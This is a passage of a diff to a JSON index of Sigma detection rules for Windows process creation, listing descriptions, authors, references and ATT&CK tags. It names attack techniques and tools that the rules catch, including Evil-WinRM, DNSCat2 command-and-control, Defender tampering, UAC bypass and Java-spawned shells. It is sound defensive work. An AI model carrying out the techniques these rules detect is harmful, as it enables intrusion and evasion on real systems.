"proc_creation_win_powershell_cmdline_specific_comb_methods.yml", + "filename": "proc_creation_win_apt_unc2452_ps.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": 
"windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md#atomic-test-7---create-a-process-using-wmi-query-and-an-encoded-command", + "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_unc2452_ps.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.t1047" + ] + }, + "uuid": "b7155193-8a81-4d8f-805d-88de864ca50c", + "value": "UNC2452 PowerShell Pattern" + }, + { + "description": "Detect possible Sysmon driver unload", + "meta": { + "author": "Kirill Kiryanov, oscd.community", + "creation_date": "2019/10/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_sysmon_driver_unload.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysmon_driver_unload.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070", + "attack.t1562", + "attack.t1562.002" + ] + }, + "uuid": "4d7cda18-1b12-4e52-b45c-d28653210df8", + "value": "Sysmon Driver Unload" + }, + { + "description": "When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. 
Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2019/10/21", + "falsepositive": [ + "Admin activity" + ], + "filename": "proc_creation_win_change_default_file_association.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_specific_comb_methods.yml" + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.001/T1546.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_change_default_file_association.yml" ], "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1546.001" ] }, - "uuid": "cdf05894-89e7-4ead-b2b0-0a5f97a90f2f", - "value": "Encoded PowerShell Command Line" + "uuid": "3d3aa6cd-6272-44d6-8afc-7e88dfef7061", + "value": "Change Default File Association" }, { - "description": "Detects specific combinations of encoding methods in the PowerShell command lines", - "meta": { - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", - "creation_date": "2022/07/06", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_powershell_cmdline_susp_comb_methods.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_susp_comb_methods.yml" - ], - "tags": [ - 
"attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "5b572dcf-254b-425c-a8c5-d9af6bea35a6", - "value": "Suspicious Xor PowerShell Command Line" - }, - { - "description": "Detects base64 encoded \"MpPreference\" PowerShell cmdlet code that tries to modifies or tamper with Windows Defender AV", + "description": "Detects a JAVA process running with remote debugging allowing more than just localhost to connect", "meta": { "author": "Florian Roth", - "creation_date": "2022/03/04", - "falsepositive": [ - "Possible Admin Activity", - "Other Cmdlets that may use the same parameters" - ], - "filename": "proc_creation_win_powershell_defender_base64.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://twitter.com/AdamTheAnalyst/status/1483497517119590403", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_base64.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "c6fb44c6-71f5-49e6-9462-1425d328aee3", - "value": "Powershell Defender Base64 MpPreference" - }, - { - "description": "Detects requests to disable Microsoft Defender features using PowerShell commands", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/03/03", - "falsepositive": [ - "Possible Admin Activity", - "Other Cmdlets that may use the same parameters" - ], - "filename": "proc_creation_win_powershell_defender_disable_feature.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - 
"https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps", - "https://www.virustotal.com/gui/file/d609799091731d83d75ec5d1f030571af20c45efeeb94840b67ea09a3283ab65/behavior/C2AE", - "https://www.virustotal.com/gui/search/content%253A%2522Set-MpPreference%2520-Disable%2522/files", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_disable_feature.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "1ec65a5f-9473-4f12-97da-622044d6df21", - "value": "Powershell Defender Disable Scan Feature" - }, - { - "description": "Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/04/29", - "falsepositive": [ - "Possible Admin Activity", - "Other Cmdlets that may use the same parameters" - ], - "filename": "proc_creation_win_powershell_defender_exclusion.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://twitter.com/AdamTheAnalyst/status/1483497517119590403", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_exclusion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "17769c90-230e-488b-a463-e05c08e9d48f", - "value": "Powershell Defender Exclusion" - }, - { - "description": "Detects PowerShell Strings applied to rundll as seen in PowerShdll.dll", - "meta": { - "author": "Markus Neis", - "creation_date": "2018/08/25", + "creation_date": "2019/01/16", 
"falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_powershell_dll_execution.yml", + "filename": "proc_creation_win_vul_java_remote_debugging.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://dzone.com/articles/remote-debugging-java-applications-with-jdwp", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vul_java_remote_debugging.yml" + ], + "tags": [ + "attack.t1203", + "attack.execution" + ] + }, + "uuid": "8f88e3f6-2a49-48f5-a5c4-2f7eedf78710", + "value": "Java Running with Remote Debugging" + }, + { + "description": "Detects suspicious shell spawned from Java host process (e.g. log4j exploitation)", + "meta": { + "author": "Andreas Hunkeler (@Karneades), Florian Roth", + "creation_date": "2021/12/17", + "falsepositive": [ + "Legitimate calls to system binaries", + "Company specific internal usage" + ], + "filename": "proc_creation_win_susp_shell_spawn_by_java.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/p3nt4/PowerShdll/blob/62cfa172fb4e1f7f4ac00ca942685baeb88ff356/README.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_dll_execution.yml" + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_by_java.yml" ], "tags": [ - "attack.defense_evasion", + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" + ] + }, + "uuid": "0d34ed8b-1c12-4ff2-828c-16fc860b766d", + "value": "Suspicious Shells Spawned by Java" + }, + { + "description": "Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications", + "meta": { + "author": "frack113", + "creation_date": "2022/07/16", + "falsepositive": [ + 
"Legitimate use" + ], + "filename": "proc_creation_win_susp_16bit_application.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/93fe92fa-8b2b-4d92-8c09-a841aed2e793/", + "https://docs.microsoft.com/en-us/windows/compatibility/ntvdm-and-16-bit-app-support", + "https://support.microsoft.com/fr-fr/topic/an-ms-dos-based-program-that-uses-the-ms-dos-protected-mode-interface-crashes-on-a-computer-that-is-running-windows-7-5dc739ea-987b-b458-15e4-d28d5cca63c7", + "https://app.any.run/tasks/214094a7-0abc-4a7b-a564-1b757faed79d/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_16bit_application.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "16905e21-66ee-42fe-b256-1318ada2d770", + "value": "Start of NT Virtual DOS Machine" + }, + { + "description": "A sigma rule detecting an unidetefied attacker who used phishing emails to target high profile orgs on November 2018. 
The Actor shares some TTPs with YYTRIUM/APT29 campaign in 2016.", + "meta": { + "author": "@41thexplorer, Microsoft Defender ATP", + "creation_date": "2018/11/20", + "falsepositive": "No established falsepositives", + "filename": "proc_creation_win_apt_unidentified_nov_18.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/DrunkBinary/status/1063075530180886529", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_unidentified_nov_18.yml" + ], + "tags": [ + "attack.execution", "attack.t1218.011" ] }, - "uuid": "6812a10b-60ea-420c-832f-dfcc33b646ba", - "value": "Detection of PowerShell Execution via DLL" + "uuid": "7453575c-a747-40b9-839b-125a0aae324b", + "value": "Unidentified Attacker November 2018" + }, + { + "description": "Detects when a possible suspicious driver is being installed via pnputil.exe lolbin", + "meta": { + "author": "Hai Vaknin @LuxNoBulIshit, Avihay eldad @aloneliassaf, Austin Songer @austinsonger", + "creation_date": "2021/09/30", + "falsepositive": [ + "Pnputil.exe being used may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Pnputil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://strontic.github.io/xcyclopedia/library/pnputil.exe-60EDC5E6BDBAEE441F2E3AEACD0340D2.html", + "https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/pnputil-command-syntax", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547" + ] + }, + "uuid": "a2ea3ae7-d3d0-40a0-a55c-25a45c87cac1", + "value": "Suspicious Driver Install by pnputil.exe" + }, + { + "description": "An adversary may use legitimate desktop support and remote access software,to establish an interactive command and control channel to target systems within networks", + "meta": { + "author": "frack113", + "creation_date": "2022/10/02", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_ultravnc.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1219/T1219.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ultravnc.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "145322e4-0fd3-486b-81ca-9addc75736d8", + "value": "Use of UltraVNC Remote Access Software" + }, + { + "description": "Detects creation of a scheduled task with a GUID like name", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/31", + "falsepositive": [ + "Legitimate software naming their tasks as GUIDs" + ], + "filename": "proc_creation_win_susp_guid_task_name.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ 
+ "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", + "https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_guid_task_name.yml" + ], + "tags": [ + "attack.execution", + "attack.t1053.005" + ] + }, + "uuid": "ff2fff64-4cd6-4a2b-ba7d-e28a30bbe66b", + "value": "Suspicious Scheduled Task Name As GUID" + }, + { + "description": "Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.", + "meta": { + "author": "frack113", + "creation_date": "2022/01/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_evil_winrm.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/Hackplayers/evil-winrm", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-3---winrm-access-with-evil-winrm", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_evil_winrm.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.006" + ] + }, + "uuid": "a197e378-d31b-41c0-9635-cfdf1c1bb423", + "value": "WinRM Access with Evil-WinRM" + }, + { + "description": "Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.", + "meta": { + "author": "Andreas Hunkeler (@Karneades)", + "creation_date": "2022/02/07", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_apt_actinium_persistence.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_actinium_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053", + "attack.t1053.005" + ] + }, + "uuid": "e1118a8f-82f5-44b3-bb6b-8a284e5df602", + "value": "Scheduled Task WScript VBScript" + }, + { + "description": "Detects Wscript or Cscript executing from a drive other than C. This has been observed with Qakbot executing from within a mounted ISO file.", + "meta": { + "author": "Aaron Herman", + "creation_date": "2022/10/01", + "falsepositive": [ + "Legitimate applications installed on other partitions such as \"D:\"" + ], + "filename": "proc_creation_win_susp_lolbin_non_c_drive.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB_30.09.2022.txt", + "https://app.any.run/tasks/4985c746-601e-401a-9ccf-ae350ac2e887/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_lolbin_non_c_drive.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "5b80cf53-3a46-4adc-960b-05ec19348d74", + "value": "Wscript Execution from Non C Drive" + }, + { + "description": "Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.", + "meta": { + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "creation_date": "2020/10/07", + "falsepositive": [ + "Utilization of this tool should not be seen in enterprise environment" + ], + "filename": "proc_creation_win_lolbin_visual_basic_compiler.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Vbc/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml" + ], + "tags": [ 
+ "attack.defense_evasion", + "attack.t1027.004" + ] + }, + "uuid": "7b10f171-7f04-47c7-9fa2-5be43c76e535", + "value": "Visual Basic Command Line Compiler Usage" + }, + { + "description": "Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions)", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/08/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_web_sysaidserver.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_web_sysaidserver.yml" + ], + "tags": "No established tags" + }, + "uuid": "60bfeac3-0d35-4302-8efb-1dd16f715bc6", + "value": "Suspicious SysAidServer Child" + }, + { + "description": "Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry", + "meta": { + "author": "Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community", + "creation_date": "2020/10/05", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_non_priv_reg_or_ps.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-20-638.jpg", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_non_priv_reg_or_ps.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "8f02c935-effe-45b3-8fc9-ef8696a9e41d", + "value": "Non-privileged Usage of Reg or Powershell" + }, + { + "description": "Detects when an adversary uses the reg.exe utility to add or modify new keys or 
subkeys", + "meta": { + "author": "frack113, Nasreddine Bencherchali", + "creation_date": "2022/08/19", + "falsepositive": [ + "Rare legitimate add to registry via cli (to these locations)" + ], + "filename": "proc_creation_win_susp_reg_add.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.001/T1562.001.md", + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_reg_add.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112", + "attack.t1562.001" + ] + }, + "uuid": "b7e2a8d4-74bb-4b78-adc9-3f92af2d4829", + "value": "Reg Add Suspicious Paths" + }, + { + "description": "Detects usage of an encoded/obfuscated version of an IP address (hex, octal...) via commandline", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_obfuscated_ip_via_cli.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Yasser_Elsnbary/status/1553804135354564608", + "https://h.43z.one/ipconverter/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_obfuscated_ip_via_cli.yml" + ], + "tags": [ + "attack.discovery" + ] + }, + "uuid": "56d19cb4-6414-4769-9644-1ed35ffbb148", + "value": "Obfuscated IP Via CLI" + }, + { + "description": "The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create \"shortcuts\" to various Windows 10 setting pages. 
These files are simply XML and contain paths to various Windows 10 settings binaries.", + "meta": { + "author": "Sreeman", + "creation_date": "2020/03/13", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_arbitrary_shell_execution_via_settingcontent.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_arbitrary_shell_execution_via_settingcontent.yml" + ], + "tags": [ + "attack.t1204", + "attack.t1566.001", + "attack.execution", + "attack.initial_access" + ] + }, + "uuid": "24de4f3b-804c-4165-b442-5a06a2302c7e", + "value": "Arbitrary Shell Command Execution Via Settingcontent-Ms" + }, + { + "description": "Detects \"regsvr32.exe\" spawning \"explorer.exe\", which is very uncommon.", + "meta": { + "author": "elhoim", + "creation_date": "2022/05/05", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_regsvr32_spawn_explorer.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.echotrail.io/insights/search/regsvr32.exe", + "https://redcanary.com/blog/intelligence-insights-april-2022/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_spawn_explorer.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.010" + ] + }, + "uuid": "6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca", + "value": "Regsvr32 Spawning Explorer" + }, + { + "description": "A General detection for sdclt being spawned as an elevated process. 
This could be an indicator of sdclt being used for bypass UAC techniques.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/05/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_high_integrity_sdclt.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.html", + "https://github.com/OTRF/detection-hackathon-apt29/issues/6", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_high_integrity_sdclt.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" + ] + }, + "uuid": "40f9af16-589d-4984-b78d-8c2aec023197", + "value": "High Integrity Sdclt Process" + }, + { + "description": "The PowerShell implementation of DNSCat2 calls nslookup to craft queries. 
Counting nslookup processes spawned by PowerShell will show hundreds or thousands of instances if PS DNSCat2 is active locally.", + "meta": { + "author": "Cian Heasley", + "creation_date": "2020/08/08", + "falsepositive": [ + "Other powershell scripts that call nslookup.exe" + ], + "filename": "proc_creation_win_dnscat2_powershell_implementation.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blu3-team.blogspot.com/2019/08/powershell-dns-c2-notes.html", + "https://ragged-lab.blogspot.com/2020/06/it-is-always-dns-powershell-edition.html", + "https://github.com/lukebaggett/dnscat2-powershell", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dnscat2_powershell_implementation.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071", + "attack.t1071.004", + "attack.t1001.003", + "attack.t1041" + ] + }, + "uuid": "b11d75d6-d7c1-11ea-87d0-0242ac130003", + "value": "DNSCat2 Powershell Implementation Detection Via Process Creation" + }, + { + "description": "Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud", + "meta": { + "author": "Max Altgelt", + "creation_date": "2022/04/06", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_creative_cloud_node_abuse.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mttaggart/status/1511804863293784064", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_creative_cloud_node_abuse.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127", + "attack.t1059.007" + ] + }, + "uuid": "df1f26d3-bea7-4700-9ea2-ad3e990cf90e", + "value": "Node Process Executions" + }, + { + "description": "Detects WMIC executing suspicious or recon commands", + "meta": { + "author": "Michael Haag, Florian Roth, 
juju4, oscd.community", + "creation_date": "2019/01/16", + "falsepositive": [ + "If using Splunk, we recommend | stats count by Computer,CommandLine following for easy hunting by Computer/CommandLine" + ], + "filename": "proc_creation_win_susp_wmic_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.hybrid-analysis.com/sample/4be06ecd234e2110bd615649fe4a6fa95403979acf889d7e45a78985eb50acf9?environmentId=1", + "https://digital-forensics.sans.org/blog/2010/06/04/wmic-draft/", + "https://blog.malwarebytes.com/threat-analysis/2016/04/rokku-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047", + "car.2016-03-002" + ] + }, + "uuid": "526be59f-a573-4eea-b5f7-f0973207634d", + "value": "Suspicious WMIC Execution" + }, + { + "description": "Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location\nAttackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on\nInstead they modify the task after creation to include their malicious payload\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_schtasks_change.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_change.yml" + ], + "tags": [ + "attack.execution", + "attack.t1053.005" + ] + }, + "uuid": "1c0e41cd-21bb-4433-9acc-4a2cd6367b9b", + "value": "Suspicious Modification Of Scheduled Tasks" }, { 
"description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", @@ -44514,6 +41559,7 @@ "logsource.product": "windows", "refs": [ "http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/", + "https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#bypass-or-avoid-amsi-by-version-downgrade-", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_downgrade_attack.yml" ], "tags": [ 
@@ -44523,385 +41569,642 @@ ] }, "uuid": "b3512211-c67e-4707-bedc-66efc7848863", - "value": "PowerShell Downgrade Attack" + "value": "Potential PowerShell Downgrade Attack" }, { - "description": "Detects a Powershell process that contains download commands in its command line string", + "description": "This rule detects DLL injection and execution via LOLBAS - Tracker.exe", "meta": { - "author": "Florian Roth, oscd.community, Jonhnathan Ribeiro", - "creation_date": "2019/01/16", + "author": "Avneet Singh @v3t0_, oscd.community", + "creation_date": "2020/10/18", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_powershell_download.yml", + "filename": "proc_creation_win_susp_tracker_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download.yml" + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_tracker_execution.yml" ], "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1055.001" ] }, - "uuid": "3b6ab547-8ec2-4991-b9d2-2b06702a48d7", - "value": "PowerShell Download from URL" + "uuid": "148431ce-4b70-403d-8525-fcc2993f29ea", + "value": "DLL Injection with Tracker.exe" }, { - "description": "Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)", + "description": "Detects suspicious process patterns found in logs when CrackMapExec is used", "meta": { "author": "Florian Roth", - "creation_date": "2022/02/28", - "falsepositive": [ - "Software installers that pull packages from remote systems and execute them" - ], - "filename": "proc_creation_win_powershell_download_patterns.yml", - "level": "high", 
- "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70", - "https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download_patterns.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "e6c54d94-498c-4562-a37c-b469d8e9a275", - "value": "Suspicious PowerShell Download and Execute Pattern" - }, - { - "description": "Detects suspicious FromBase64String expressions in command line arguments", - "meta": { - "author": "Florian Roth", - "creation_date": "2020/01/29", - "falsepositive": [ - "Administrative script libraries" - ], - "filename": "proc_creation_win_powershell_frombase64string.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_frombase64string.yml" - ], - "tags": [ - "attack.t1027", - "attack.defense_evasion", - "attack.t1140", - "attack.t1059.001" - ] - }, - "uuid": "e32d4572-9826-4738-b651-95fa63747e8a", - "value": "FromBase64String Command Line" - }, - { - "description": "Detects usage of the 'Get-Clipboard' cmdlet via CLI", - "meta": { - "author": "Nasreddine 